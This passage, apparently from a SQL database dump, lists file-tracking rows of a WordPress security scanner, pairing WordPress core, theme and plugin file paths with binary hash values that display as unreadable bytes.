��هd�8�~�[R','',0,'?'),('a���\0K��y��%��','wp-content/themes/hueman/languages/ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:s��R���aF���','�!���09�,�H^û�f��,���x�::','',0,'?'),('a�;�q�Dĵ̡�M}�','wp-content/themes/fabulous-fluid/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�-�5M�5ĝ�7!�',',u6Ʉ�u�R�r)`�I�S���)�8��pOg�','',0,'?'),('a�G	W�s��P����','wp-content/themes/sg-window/publication/inc/customizer.php',0,'��Љ�yg��_�+��','��Љ�yg��_�+��','��_��<��“� �T����-��;�,s�','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'�&!b�\n���x�R��)','�&!b�\n���x�R��)','IJ��q#�4\0\\�8�UgŖ�?{�H��G8�Ԉ','',0,'?'),('a��S�.Q�&�0e�͑','wp-content/themes/the-minimal/inc/widget-popular-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�4�����a�<W','�V��v��ʹ��P3oq@��Q�؇w���','',0,'?'),('a���(�PB֏@���.','wp-content/plugins/spam-captcha/core/css/diff_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\\Z�Ǐ�Qx\\q��','d�)���ɚ�@1ؑyMXɡ ��>9����Q','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r�	��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�7h�Ҝ�2Q��p�(','�\0?9Џf@\'KۧS�l%u~��>\"�Z�H�','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{d�����vFئ��','\'2��8����:ou�[��WA�Hg`o?�C��','',0,'?'),('a�~*k`D�np�}��f','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+f)��W;kgWJ��','�`�%��qY2��ʌ��?ǽ����ͷ]���','',0,'?'),('a�0�}�踀�@���~','wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fB��RJ���z�L���','�b\n=W��p�����=����3���9�\"֗;','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��3�n,o�Ћ�','�!K����\0R���$��x���`�68��P&��','',0,'?'),('a�=E�D.9��>�#�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon/static.php',0,'H�׌����x�B','H�׌����x�B','�#�fc����2	���Fz*	M�N��4��V','',0,'?'),('b\0��\0�+m\0Z]��','wp-content/themes/hueman/assets/front/img/sidebar/s-right-dual-full-expand.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k ϴ��2���:�D�','~$���^��&F#�|H�o�K���X�!����','',0,'?'),('b n��a���Ipw','wp-content/themes/illdy/layout/js/count-to/count-to.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r;�W��O��q��Xb','���Zϵ����/���k�;�-�|%Wީ7/','',0,'?'),('b\nZ��37>T��\\eR�','wp-content/themes/nirvana/images/patterns/pattern.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G&�ϯxZ]�','�+����}8j����h��9O��q h�z�$�','',0,'?'),('b\'\0?�`��R�T4\0','wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/js/image-picker/image-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','niɕ\r�~j����N�@�','�\'䦞HL��-����#����4��L��','',0,'?'),('b5�LD\"1�-�rDj�','wp-content/themes/relia/inc/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�����b���G','�U�~舩�\"[I���x�\"q�bs�F�/J�','',0,'?'),('bBa@��N/�N}���','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.itsyourdomain.php',0,'\04I6x�I�]�wh��','\04I6x�I�]�wh��','���]&�1`F\nC������A�m��\\)R���','',0,'?'),('bWNo�󭬱�Wbt�b`','wp-content/themes/illdy/layout/images/footer-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‘a�an�-�ܯ�S��\Z','	)�<^�F�a��x&�ʊ�MaT\nzQ�~�X','',0,'?'),('bW�� 5d�p)H}ƽ�','wp-content/themes/clean-magazine/images/gallery/featured2-350x263.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȁ�>߯b	�2w^\n','�x�*�2F,��bn�J��[?�����<;h�g','',0,'?'),('bY�,��ϥY�r۝�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('bfi>y�-�e#\\�6O�','wp-content/themes/clean-magazine/js/source/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rY����ny{���$','��H2L�eV���K�3]T�#�b֑��V�','',0,'?'),('bs��>�g\"�y��F�','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǧ׮!z�r�:��','��(�`�zQ��9�+�!���ZsO(�E>_��','',0,'?'),('b�bY#����E����','wp-content/themes/precious-lite/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�k4�P�ph��#�D��','0�gt��i�J�5�fN?�\na��N�*����{s͎','',0,'?'),('b��HV��mA �Mh�\"�','wp-content/themes/twentytwenty/assets/images/2020-square-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܴ���6T�k�x','�L�w%���7�M��ȴ�x� � >��?\\�','',0,'?'),('b����gF#V.���','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ie.php',0,'�K�=�X�T�.u��','�K�=�X�T�.u��','�������\\	�`��O�g#� ��1�|.','',0,'?'),('b�\"����e�}V��','wp-content/themes/square/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���[�\n�������7�','6)-�H���\\�_R���;ɑ�:�cҹ^�Q\\�','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@����	�|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F꡻�S)8�׆>]�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('b�8wĶ��\r���^��','wp-content/themes/illdy/inc/customizer/panels/general-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TQyZ�@a�L�	�','q�:�#�Q�…�M$�;��	n�^m�?=��N','',0,'?'),('b�l����MD;�Z��','wp-content/themes/illdy/inc/admin/welcome-screen/sections/changelog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�p�AU�~�l-%O�O�','�����vJ����̛Z�:ǜ�e��Z�','',0,'?'),('b񪥲K�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$L���ڎeAr����','9�pb@gSz�1_x� �K��N����Q�8�','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����=;J�x����&','�4���\\��Vʢ���&��H����9�Mc�','',0,'?'),('c�.�K-��k3��d�','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php',0,'�`=ge��!���H','�`=ge��!���H','\\ß:��TcL�H�^P\n|�+B�ˤ��*���>','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d�B��#�&&��','{��bk��\r���}�	{=��\\�=6�`l��	','',0,'?'),('c‹���p	�PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c\Z�3��3S�`�','wp-content/themes/panoramic/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�1�Vg�M�X���0�','h;Xw�;��h^�M?�ح-�s��U�7_��','',0,'?'),('c+1g�lM��,N�N','wp-content/themes/alpha-store/img/pattern.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\"�_�$S��}=M��','��V��/��ū�Z�����!��(Kb�h;�K','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ����	}M�g� �$�0� [���B','',0,'?'),('c0�?�u��>v�','wp-content/plugins/wordpress-seo/admin/views/dashboard-widget.php',0,'=�d˖����	�','=�d˖����	�','���.�q||�`Ih��3���V}�W#&�|','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��݆��Ζ���}l�','e`݆�.�΃:��j�E�\Z�Ұ���5�\Z�)','',0,'?'),('cD�jz�{��6��	�','wp-content/themes/skt-construction-lite/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�ï\"I��\n���','�o�\0Cj���\ZM�;2�D���\r�2	����','',0,'?'),('cj3������A�q=','wp-content/plugins/spam-captcha/lang/spam_captcha-ja_JP.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�Z�6\Z�;�yXK2F','Y����?Y-��fM�7E�n�d��p�+\'�u�','',0,'?'),('c�������&hd��8','wp-content/themes/supernews/assets/library/bxslider/css/jquery.bxslider.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MGU���Ԧ������','~��[d�P(H9�e!��1�|\\b�p��1�o','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�UP��(�2\\�IJ#v','�$t/Ex^�oާ�u�ڊ�z��DJ\r��&K�','',0,'?'),('c�\"�9�ە��Z��','wp-content/themes/wen-business/third-party/mmenu/js/jquery.mmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���N���\0����P�','���+��\Z���oU����U>�����>�\0�','',0,'?'),('c�Xx��gD��3n��','wp-content/themes/nirvana/images/socials/Contact.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R)t�/��\0B����uP','Cy�̉�\r�r��>yJ� ��׎��J;���','',0,'?'),('c��8�iOA�*�Z$=6','wp-content/themes/nirvana/fonts/opensans-extrabold-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�tS���*8PkL�','_5�p���#�hI�~9^�p�i9	O�:�','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U��	X�g����','�T�Ϛ-�1 [�@./i󒶦�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_�k�\r�K�r��','�W7��ݱ�3�H�E���.���VAvc��','',0,'?'),('d��&�|����\0�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/config.php',0,'#-ix�6��sm��','#-ix�6��sm��','�}]Ҭ����A�h�*`\rl,���lNn�','',0,'?'),('dD�`��qt�^��','wp-content/themes/morfeu/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Ɏw�B?���t���','\Z�x<q�j�G>Jf���^,��b�ێ�rU~a','',0,'?'),('dF=���j��Hc�����','wp-content/plugins/akismet/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]x�\"�Y�����KJ','\Z�Ia�^���iJ��H�:�j�:���b�Š�','',0,'?'),('d`#/�v��e�c�m�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.us.php',0,'�S�Ss�sh��Q��8�K','�S�Ss�sh��Q��8�K','���#8�t����a�u����c�3~B7�X�{kI','',0,'?'),('dx�u��չ.%±%�w�','wp-content/themes/clean-magazine/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�\\̃��=�:ǧ','�}�.C�x4��%#��O^ك\"�09f��@','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\rc�c�l��?ɴծ','9� ÂM�\0KR���&���#+�vCf��','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q����\\w��\\�','I5~(�ι�ܻNIi�4���;Zޭ�Y�\"�D�','',0,'?'),('d���\0����8��','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/sidebars.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hy9Ơݩ����U(u	,','���r���J�Z �8h��|d���v.�','',0,'?'),('d����Mv&���d1�','wp-content/themes/panoramic/customizer/customizer-library/custom-controls/textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����W�?\0��>|�','���@�R�y��xb%j@�]�`̊�,��:��','',0,'?'),('d�1u��@�Jټ��3','wp-content/plugins/spam-captcha/lang/spam_captcha-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M?�����d\0<#�','��ģ�<,[�S�\"�&\Z�\\��ji̊6�$�\Z','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<3�8xuFR�ĖȦ�E','n��?Q��bz	��٢�)��S*��,Z�','',0,'?'),('d��b�·�F9��H','wp-content/themes/nirvana/images/socials/Flickr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	���uq�\'��To;�j','�(��֪[���|��`�E��o�v�B]�','',0,'?'),('d���&@�f���ˏ��J','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/call-to-action/config.php',0,'�v>c�oE�_��8>�','�v>c�oE�_��8>�','l�q���t*��r��cF}��u�a:��\r�','',0,'?'),('d���J^���mY\'�g�','wp-content/plugins/spam-captcha/core/img/tree_lastnode_plus.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^VA�\'��i��6','\\�Q��\\��6G�e����>���@^��l�5d��','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bP�L�@~F�I�GV2LK','N8��*�!o��uaT�8��\r�3�ްS�&Ė�0','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('d��`�T6�!��7+x��','wp-content/themes/mh-magazine-lite/languages/de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[ꚨ#�}�HJ^wS','ŝ�;~:J�mpvj���v54~0�+�)>.��','',0,'?'),('d��v�Y��R�/Yp','wp-content/themes/square/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tLOJ�6�ʉ��n��$:','˩U2�ɲv��\\V��V\'\r�*j���AE>:','',0,'?'),('d��;3�b((M\0p{��','wp-content/themes/the-minimal/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=�W���b&�W','�}�.�����$]���%�0��R�Y�Sy�','',0,'?'),('d��\\_�\"���K�','wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|I��5\Z+�������','�,����Pp��h�%s��ą�d��[��','',0,'?'),('d�?pdV�7L�\n9D1\"','wp-content/themes/travelify/languages/fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�`��0�uR�\Zk�Z','!36��V�\\�j�|~��Ҡ?��[]�:��','',0,'?'),('e\0�\"�K��CҜ~��)','wp-content/themes/alpha-store/template-parts/template-part-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!4\"��y�g�X�nx_','�f1����(�gn�+������t�f9�j�`\r�','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��H��%���Y','���V��/r:s�/�S��l�\"#��:�3�','',0,'?'),('e��e{��:\0�vy','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�84|�]��h�֤�','����Aݻ�F�d�s`����0$$�{^����=�','',0,'?'),('e��f}JNb���7�2','wp-content/themes/panoramic/upgrade/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7���e�	T%{U~X�','Zu۴��y5�i��$��8\'�R�g�c\Zڎg+�','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e�����ʃ�<tEf','wp-content/plugins/spam-captcha/core/lang/SL_framework-ro_RO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��WP�،�(<�m�4','&Fg�N|�1���X�T�چ�gn�ڪr?�K��Ԓ','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�رm:h�\rGZ�ڋY','t8uU��U��SĒ�qf����S�3i���i�u','',0,'?'),('e%���Z��eq&�3','wp-content/plugins/unyson/framework/static/libs/entypo/fonts/entypo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oѶp$�����Dž�	','F5�i��?����m�%Jj�y{mP�\n���	�Ol�','',0,'?'),('e-�\0<|Pˆ�+��%r5','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/config.php',0,'t��\n�m�t��!<��','t��\n�m�t��!<��','�l%��s�h��\r[�*������27�M���-,','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :\'D<��*T;�G�','W 3\n�\'@G8y��;�FwTD���Zv�X�}��','',0,'?'),('e?_J��r�\r�G�ݴ�','wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/helpers.php',0,'E7錎t=1Y1@����','E7錎t=1Y1@����','����ؗ@��+\'���4�1�K*i������\n','',0,'?'),('eH-�v�&��[�L״�','wp-content/themes/vega/assets/js/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�\n��&���r','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('eJ���w�qv�{0�','wp-content/themes/mh-magazine-lite/languages/ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�YQ�.-F4��','��g�u�\0R�2<`�,|Yn�E�g0�f�3��','',0,'?'),('eLn�£p�H��:�','wp-content/themes/aqueduct/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����=U�&�x','M����n+�$S�o���T�����D�{1I�Xŷ','',0,'?'),('eb	j޾��J\"��k�','wp-content/themes/aqueduct/img/gridposts.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�mG�]\rcә���*','N@�92()�5�.��Z���0z�x��dA5�O','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('em?��V�†�=��','wp-content/themes/fluida/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>+�[a*Y��N�„C�','�g���#�v��Pnx:�����M0[��$t�m��','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`X�c�b7�qNS�','�M���G�] �?u��gP�p1�,�(�V�^���','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c��	;���*r3$X����G8ͬRK�','',0,'?'),('e�E��YRd�����','wp-content/themes/skt-construction-lite/footer.php',0,'7���,����[�9�','7���,����[�9�','B��k��e��6�7=��T7�>��fYV','',0,'?'),('e�+tzEmv�[W�','wp-content/themes/nirvana/images/socials/WordPress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?W`�����㚟���','�M�}]���^1�M��T�\\�̷���0��','',0,'?'),('e�pIE(���&@�&��','wp-content/themes/precious-lite/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��{Q�b���a5K','\r�{��9���}���l�qSd���b4`�','',0,'?'),('e���~n�p�ZP�#�','wp-content/plugins/unyson/framework/extensions/shortcodes/extensions/wp-shortcodes/manifest.php',0,'\\���Rl���o�i\'��','\\���Rl���o�i\'��','��*�G5]��`B�\n�<�A�n�4�( -�դ','',0,'?'),('e�щ�G�7��X�?\0B','wp-content/plugins/wordpress-seo/admin/pages/social.php',0,'L��ioƖ	\Z����{�','L��ioƖ	\Z����{�','�~���\"�I{6�p;=c,��V8؅m�\0���','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+�	��uzR�W	QW�|��5��� j[;U|�','',0,'?'),('e�r�@uw�6����','wp-content/themes/lightly/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������j`7E','z�����)��0���At�gw�fư��\"{�','',0,'?'),('e�e��:]`�v򑨶��','wp-content/themes/supernews/acmethemes/customizer/header-options/header-news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�e��TGfPv����%','Ej�U%2 ��ߺ�s@�5���އ%n�ɏ�','',0,'?'),('e��2V�9��Y�s','wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-framework-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e;�	%���y��','�Q:��H�D�|4�8�1HA������Mz��\"�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('eއ��D�z\r\Z\n���)','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�أ9�:�6�����	','\ZW�\0��&a\"w#��#b�e\\�f2�����T�P','',0,'?'),('e��g��!?��[@��<','wp-content/themes/clean-magazine/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lѰj��q����C�','��k�����(������W};0l�����','',0,'?'),('fkp���~����7��','wp-content/themes/twentyseventeen/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��{D��5q��\Z','[ޫONi�N%�j�e�2�ƨpߎG�2��K(�.�','',0,'?'),('fgq�c�����؅v','wp-content/themes/illdy/inc/customizer/panels/blog-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���q�\\\nK�\\����','�4����Q)]N-������n�\\L��s�&��','',0,'?'),('f��Ի�¦���I','wp-content/themes/fabulous-fluid/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','å����0Ipw���^��','\'�9�rzC�~�dCh�Pyk}:�Q�7:���k','',0,'?'),('flEA��UZ�T!�','wp-content/themes/morfeu/assets/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�s�f����$+T�','�JC�V~�m16?ÀrOk��L�-��|�I^�','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\'N��S.;\r��MT','���2�婢��Mz�֡�XX~��u*<�.v�~','',0,'?'),('f�?q����ȝ�c��','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/helpers.js',0,'\\�M�ы�F~�\r���i','\\�M�ы�F~�\r���i','�k�b>17ۂ��W� L��,U��\r�ȼ��g','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�\'ʐ�i��Y+','�C�:d42q�2uƥ8�4����i;����','',0,'?'),('f�F��Q������','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.kh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Av��L���=F<��-��','s���ӛ����H	�e*C��$yAՉ�U)�հ','',0,'?'),('f�h�iNR2��p0��a�','wp-content/plugins/wordpress-seo/js/dist/wp-seo-admin-gsc-350.min.js',0,'�64d�c���h��<','�64d�c���h��<','�8U�Yw�岵�<JV\nx�t|��p����|','',0,'?'),('f����e���L8��','wp-content/plugins/contact-form-7/languages/contact-form-7-nb_NO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g9��נ��J��w��','<��햎��.QIl�: ��E��ℙ�d���o','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� \Z�{Uw5��d��tm','%�,�~��8Jo\r�q�38��\r�b�','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��]�/����:��j�','�.g��.�:�kE�e\'[�N\nq[M�V5f$�ѽ(','',0,'?'),('f���W7a�!o\r�+','wp-content/plugins/spam-captcha/core/lang/SL_framework-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_D%@�̯<G�','�������Q��;N�Mxq�\r���i9���','',0,'?'),('f����B��^\n��','wp-content/themes/the-minimal/images/prev.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AxR=�F�wR